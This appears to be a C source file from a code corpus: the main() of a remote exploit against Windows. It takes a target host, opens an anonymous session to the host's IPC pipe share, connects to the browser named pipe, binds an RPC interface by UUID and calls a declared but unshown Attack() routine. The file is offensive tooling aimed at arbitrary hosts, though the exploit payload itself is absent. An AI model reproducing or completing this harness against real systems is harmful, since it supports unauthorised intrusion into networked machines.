
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


typedef int unc ;
typedef int szPipe ;
struct TYPE_3__ {char* lpRemoteName; int * lpProvider; int * lpLocalName; int dwType; } ;
typedef TYPE_1__ NETRESOURCE ;
typedef int HANDLE ;


 int Attack (int ) ;
 int BindRpcInterface (int ,char*,char*) ;
 int CreateFile (char*,int,int ,int *,int ,int ,int *) ;
 int GENERIC_READ ;
 int GENERIC_WRITE ;
 int MAX_PATH ;
 int OPEN_EXISTING ;
 int RESOURCETYPE_ANY ;
 int WNetAddConnection2 (TYPE_1__*,char*,char*,int ) ;
 int _snprintf (char*,int,char*,char*) ;
 int printf (char*,char*) ;

int main(int argc, char* argv[])
{
       char *server;
       NETRESOURCE nr;
       char unc[MAX_PATH];
       char szPipe[MAX_PATH];
       HANDLE hFile;

       if (argc < 2)
       {
               printf("Usage: %s <host>\n", argv[0]);
               return 1;
       }
       server=argv[1];
       _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
       unc[sizeof(unc)-1] = 0;
       nr.dwType = RESOURCETYPE_ANY;
       nr.lpLocalName = ((void*)0);
       nr.lpRemoteName = unc;
       nr.lpProvider = ((void*)0);
       WNetAddConnection2(&nr, "", "", 0);

       _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server);
       hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, ((void*)0), OPEN_EXISTING, 0, ((void*)0));

       BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");


       Attack(hFile);
       return 0;
}
